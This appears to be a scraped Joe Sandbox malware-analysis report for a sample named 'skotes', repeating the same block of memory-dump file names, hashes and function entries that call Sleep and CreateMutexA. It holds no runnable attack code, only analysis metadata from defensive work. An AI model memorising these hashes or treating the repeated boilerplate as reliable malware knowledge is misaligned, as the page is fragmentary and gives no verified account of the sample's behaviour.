Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: 76633a3bbc65effeb15eaadd3132304abcccb8e939c115e77743b710f65cbc6d
Instruction ID: 9035cd72e8e87afb1cf2dd3288b3e9b7992bfb170802896b4eac463d4af96260
Opcode Fuzzy Hash: 76633a3bbc65effeb15eaadd3132304abcccb8e939c115e77743b710f65cbc6d
Instruction Fuzzy Hash: 92314871714204ABFB189B7CDC8EBADB772DB91314F204219E094AB2D7D73E99808756

Function 0073A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: 0311f93921f016758a51adbddc1147a092fb270e5a317a8cac1106649cc62d6e
Instruction ID: aef0c943290679dbb11b4ab2feee19ae94084a37894fefe20789decb04693905
Opcode Fuzzy Hash: 0311f93921f016758a51adbddc1147a092fb270e5a317a8cac1106649cc62d6e
Instruction Fuzzy Hash: AF314C71B04100ABFB189B7CDC8EB5DB772ABD6310F204219E094A72D7D73E59808756

Function 0073A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: 6c893eaf49434e411d37a484383a7982055c91362829c52120c3441181f292da
Instruction ID: b10507a98111474deadc36672f5033e6f7ad3760afd5136aac7817671808709a
Opcode Fuzzy Hash: 6c893eaf49434e411d37a484383a7982055c91362829c52120c3441181f292da
Instruction Fuzzy Hash: CC313B71B04140ABFB189B7CDC8EB6DB761EBD1314F204218E494AB2D7D77D59808766

Function 0073A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: 931f0f9cb7b4bb69585bb056b4a51d017c3875f27f45987a91838e50121c4140
Instruction ID: 09c148fa56cd136f1fa488c3227d54c34c075232dd39a621d6c60284d9131832
Opcode Fuzzy Hash: 931f0f9cb7b4bb69585bb056b4a51d017c3875f27f45987a91838e50121c4140
Instruction Fuzzy Hash: 8B313731704100EBFB18DB78DC8EBADB762ABD1314F248218E494AB2D3DB3D99808712

Function 0073A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: 24594f4c3c94a16f6cb24da3b6d3eb5ae6b4aeac20b571c51feb9910906b5115
Instruction ID: 40108a382721054dd1636697f8bce579f63672994bd86a50de9cc66c3e633b36
Opcode Fuzzy Hash: 24594f4c3c94a16f6cb24da3b6d3eb5ae6b4aeac20b571c51feb9910906b5115
Instruction Fuzzy Hash: 4D310771704200EBFB18DB78DC8EBADB772AB91314F248219E494AB2D7D73D99808656

Function 00739ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: a773a4843f27e817095821d3f532df6402ddab6f0b2a93e0b1eaebc2dbf7940c
Instruction ID: d2a56dfa295d5de252a6b942c10c3a459921f6122daac3cf83fae187300bfe1d
Opcode Fuzzy Hash: a773a4843f27e817095821d3f532df6402ddab6f0b2a93e0b1eaebc2dbf7940c
